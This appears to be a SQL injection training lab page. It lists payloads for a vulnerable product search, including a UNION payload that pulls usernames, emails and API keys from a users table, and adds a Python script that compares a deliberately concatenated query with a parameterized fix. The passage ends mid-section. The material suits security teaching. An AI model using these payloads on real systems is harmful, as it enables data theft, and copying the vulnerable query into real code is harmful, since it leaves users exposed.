SQL Injection Lab

Product Search

Search for products in our database. This search function is vulnerable to SQL injection attacks.

🚨 Vulnerability Information

This search function is vulnerable to SQL injection because it concatenates the raw search term into the SQL string instead of passing it as a bound parameter of a prepared statement. A single quote in the input closes the string literal the application opened, and everything after it is parsed as SQL rather than as data.

Try these payloads in the search box:

admin_credentials
Not an injection at all: a plain search term that hits a record the lab marks as confidential, showing that the search returns CONFIDENTIAL rows to anyone with no authorization check

' OR '1'='1
Boolean-based injection: the tautology '1'='1 makes the WHERE clause true for every row, so the query returns all products

' UNION SELECT id, username, email, role, api_key, '' FROM users--
Union-based injection: appends a second SELECT against the users table, so its rows come back in the product result set; the trailing '' pads the column count to six to match the products query

test'--
Comment injection: -- starts a SQL line comment, so the closing quote and any conditions the application appends after the input are ignored

' OR 1=1 UNION SELECT id, name, category, price, description, stock FROM products WHERE category='CONFIDENTIAL'--
Combined injection aimed at the CONFIDENTIAL category. Note that OR 1=1 already returns every product, so the UNION only re-adds the confidential rows (UNION drops the duplicates); to get only the confidential rows, use AND 1=0 in place of OR 1=1 so the left-hand SELECT matches nothing

Database Schema Information

For educational purposes, here's the database structure:

Tables:
• products (id, name, category, price, description, stock)
• users (id, username, email, role, api_key)

Note: The UNION injection payload above demonstrates how to extract data from the users table by matching the column count of the products query (six columns, with '' as a filler). Most databases also require the columns of each SELECT to have compatible types, so a filler value is chosen to fit the type of the column it lands in.
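The following is an added example, not the lab's own code. The lab does not show its query text, so the query shape here is an assumption (an exact-match lookup, SELECT ... FROM products WHERE name = '<term>'); the two tables follow the schema above and the rows in them are constructed for this example. It runs every payload from the list against the vulnerable concatenated query and against a parameterized replacement, and adds one payload of its own (the AND 1=0 variant) to show a UNION that returns only the confidential rows.

```python
import sqlite3

# Constructed in-memory schema following the lab's two tables (sample rows are invented).
SCHEMA = """
CREATE TABLE products (id INTEGER, name TEXT, category TEXT, price REAL, description TEXT, stock INTEGER);
CREATE TABLE users (id INTEGER, username TEXT, email TEXT, role TEXT, api_key TEXT);
"""
PRODUCTS = [
    (1, "Widget", "tools", 9.99, "A basic widget", 10),
    (2, "Gadget", "tools", 19.99, "A useful gadget", 3),
    (3, "admin_credentials", "CONFIDENTIAL", 0.0, "Internal admin login, not for sale", 0),
]
USERS = [
    (1, "admin", "admin@example.test", "admin", "KEY-ADMIN-0001"),
    (2, "alice", "alice@example.test", "user", "KEY-ALICE-0002"),
]
COLUMNS = "id, name, category, price, description, stock"


def make_db():
    """Build a fresh in-memory SQLite database holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO products VALUES (?,?,?,?,?,?)", PRODUCTS)
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?)", USERS)
    return conn


def search_vulnerable(conn, term):
    """The lab's bug reproduced: the search term is spliced into the SQL text.
    Assumed query shape; the lab does not publish its actual query."""
    sql = f"SELECT {COLUMNS} FROM products WHERE name = '{term}'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Hardened version: the term travels as a bound parameter, so the query
    shape is fixed, and confidential rows are excluded server-side because
    parameterization alone does nothing about the missing authorization check."""
    sql = f"SELECT {COLUMNS} FROM products WHERE name = ? AND category <> 'CONFIDENTIAL'"
    return conn.execute(sql, (term,)).fetchall()


# The lab's payloads, plus one legitimate search and one added variant.
PAYLOADS = {
    "legitimate": "Widget",
    "plain": "admin_credentials",
    "boolean": "' OR '1'='1",
    "union": "' UNION SELECT id, username, email, role, api_key, '' FROM users--",
    "comment": "test'--",
    "complex": "' OR 1=1 UNION SELECT id, name, category, price, description, stock "
               "FROM products WHERE category='CONFIDENTIAL'--",
    # Added here: the left-hand SELECT matches nothing, so only the UNION rows come back.
    "targeted": "' AND 1=0 UNION SELECT id, name, category, price, description, stock "
                "FROM products WHERE category='CONFIDENTIAL'--",
}


def run_payloads(search):
    """Return {payload name: number of rows returned} for one search implementation."""
    conn = make_db()
    counts = {}
    for name, term in PAYLOADS.items():
        try:
            counts[name] = len(search(conn, term))
        except sqlite3.Error as exc:
            counts[name] = f"error: {exc}"
    return counts


if __name__ == "__main__":
    for label, fn in (("vulnerable", search_vulnerable), ("safe", search_safe)):
        print(label, run_payloads(fn))
```

Against the vulnerable query the boolean payload returns every product, the UNION payload returns the two user rows including their api_key values, and the "complex" payload returns no more than the boolean one because its OR 1=1 already matched everything; the "targeted" variant returns only the confidential row. Against the parameterized query every payload is treated as a literal product name and returns nothing, while the legitimate search still works.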

Learning Objectives

This lab demonstrates: